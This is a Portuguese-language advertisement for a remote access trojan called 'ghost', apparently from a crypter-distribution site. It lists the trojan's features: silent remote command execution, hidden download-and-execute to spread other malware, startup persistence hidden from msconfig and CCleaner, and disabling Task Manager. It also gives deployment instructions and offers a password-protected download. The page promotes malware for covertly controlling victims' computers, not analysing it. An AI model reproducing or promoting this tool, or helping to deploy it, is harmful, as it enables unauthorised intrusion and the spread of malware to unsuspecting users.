O ghost é um RAT leve que fornece ao servidor / invasor acesso remoto completo ao interpretador de linha de comando do usuário (cmd.exe). Eles têm permissão para executar comandos silenciosamente, sem que o cliente / zumbi perceba. O servidor / atacante também tem a capacidade de baixar e executar arquivos no computador do cliente / zumbi. Este também é um processo silencioso e oculto. Como a maioria dos cavalos de Troia de acesso remoto, esse recurso de download e execução ajuda a distribuir vírus e outras partes de malware.

Este malware é distribuído simplesmente executando o zombie.exe . Este nome de arquivo pode ser alterado para qualquer que seja. Não há restrição. Quando executado, ele procura os dois primeiros argumentos (IP e porta). Se nenhum deles for fornecido, o programa não será executado. Com isso dito, certifique-se de fornecer o IP e a porta do servidor nos argumentos da linha de comando. Exemplo:

zombie.exe 127.0.0.1 27015

Bot Features

  • Execução de comando remoto
  • Processo silencioso em segundo plano
  • Baixe e execute o arquivo (Oculto)
  • Inicialização no modo de segurança
  • Conectará automaticamente ao servidor
  • Os dados enviados e recebidos são criptografados (cifra de substituição)
  • Arquivos ocultos
  • Antivírus instalado mostrado ao servidor
  • Espalhe facilmente malware através do recurso de download
  • As informações de inicialização não são exibidas no msconfig ou em outros programas de verificação de inicialização, como o CCleaner
  • Desativar o Gerenciador de tarefas

Quando iniciado com êxito, ele se adiciona ao pool de inicialização e é executado silenciosamente em segundo plano. Ele tentará se conectar repetidamente ao servidor. Esse processo não monopoliza qualquer uso de memória ou CPU. Isso significa que o zumbi silenciosamente fica ocioso em segundo plano e sempre que o servidor estiver ativo, ele se conectará automaticamente.

Download

Password: fullcrypters.net